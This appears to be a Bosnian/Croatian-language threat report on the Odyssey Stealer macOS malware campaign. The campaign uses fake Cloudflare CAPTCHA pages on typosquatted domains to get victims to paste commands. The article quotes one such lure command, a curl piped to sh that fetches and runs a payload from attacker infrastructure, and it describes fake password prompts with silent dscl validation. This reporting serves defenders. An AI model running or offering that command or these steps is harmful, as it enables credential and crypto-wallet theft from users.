Nova sofisticirana kampanja zlonamjernog softvera usmjerena na korisnike macOS-a koristi obmanjujuće “Clickfix” taktike za distribuciju zlonamjernih AppleScriptova dizajniranih za prikupljanje osjetljivih korisničkih akreditacija i financijskih podataka. Ova kampanja iskorištava domene sa tipografskim greškama koje se veoma podudaraju sa legitimnim financijskim platformama i web-stranicama Apple App Storea, stvarajući uvjerljivu fasadu koja navodi korisnike na izvršavanje opasnih naredbi na svojim sistemima.
Napadački proces započinje kada korisnici nehotice posjete zlonamjerne domene koje prikazuju lažne upite za CAPTCHA u stilu Cloudflarea. Ove naizgled legitimne stranice za verifikaciju upućuju korisnike macOS-a da kopiraju i lijepe Base64 kodirane naredbe u svoje terminalske aplikacije kako bi dokazali da nisu roboti. Nakon izvršavanja, ove naredbe pokreću sveobuhvatnu operaciju krađe podataka koja cilja na akreditacije pregledača, kriptovalutne novčanike i osjetljive osobne podatke pohranjene u raznim aplikacijama.
Istraživači iz Cyfirme identificirali su ovaj zlonamjerni softver kao Odyssey Stealer, preimenovanu verziju prethodno poznatog Poseidon Stealera, koji je sam nastao kao fork AMOS Stealera. Tim za istraživanje otkrio je više komandno-kontrolnih panela povezanih s ovom aktivnošću, s infrastrukturom uglavnom smještenom u Rusiji. Zlonamjerni softver pokazuje jasnu sklonost ciljanju korisnika u zapadnim zemljama, posebno u Sjedinjenim Američkim Državama i Europskoj uniji, dok uočljivo izbjegava žrtve u zemljama ZND-a.
Odyssey Stealer predstavlja zabrinjavajuću evoluciju u zlonamjernom softveru usmjerenom na macOS, kombinirajući taktike socijalnog inženjeringa sa sofisticiranim tehničkim mogućnostima. Za razliku od tradicionalnog zlonamjernog softvera koji se oslanja na ranjivosti softvera, ova kampanja iskorištava ljudsku psihologiju predstavljajući korisnicima poznate sigurnosne upite koji izgledaju kao uobičajeni postupci verifikacije. Napadači su pažljivo izradili svoje distribucijske web-stranice kako bi oponašali pouzdane platforme, čineći detekciju posebno teškom za nesuđene korisnike.
Mehanizam infekcije zlonamjernog softvera oslanja se na višestupanjski proces koji započinje tipografskim greškama domena i kulminira sveobuhvatnom kompromitacijom sistema. Kada korisnici posjete zlonamjerne domene, nailaze na profesionalno dizajnirane stranice koje repliciraju izgled legitimnih CAPTCHA sistema za verifikaciju. Lažni upit prikazuje upute za macOS korisnike da izvrše naredbu koja izgleda ovako: `curl -s http://odyssey1.to:3333/d?u=October | sh`.
Ova naredba preuzima i izvršava AppleScript sa servera za komandovanje i kontrolu napadača. Skript koristi alfanumeričku obskurnost kako bi sakrila nazive funkcija, iako analiza otkriva njegovu pravu svrhu. Nakon izvršavanja, zlonamjerni softver stvara strukturu privremenih direktorija koristeći naredbu `mkdir`, specifično uspostavljajući `/tmp/lovemrtrump` kao svoju operativnu bazu. AppleScript zatim prikazuje uvjerljiv upit za autentifikaciju dizajniran za hvatanje korisničke sistemske lozinke.
Za tihu validaciju ukradenih akreditacija, koristi se naredba macOS `dscl` sa parametrom `authonly`, osiguravajući da proces verifikacije ostane skriven od korisnika. Ova tehnika omogućava zlonamjernom softveru da potvrdi valjanost lozinke bez pokretanja sistemskih upozorenja ili sumnje korisnika, demonstrirajući duboko razumijevanje napadača o sigurnosnim mehanizmima macOS-a.
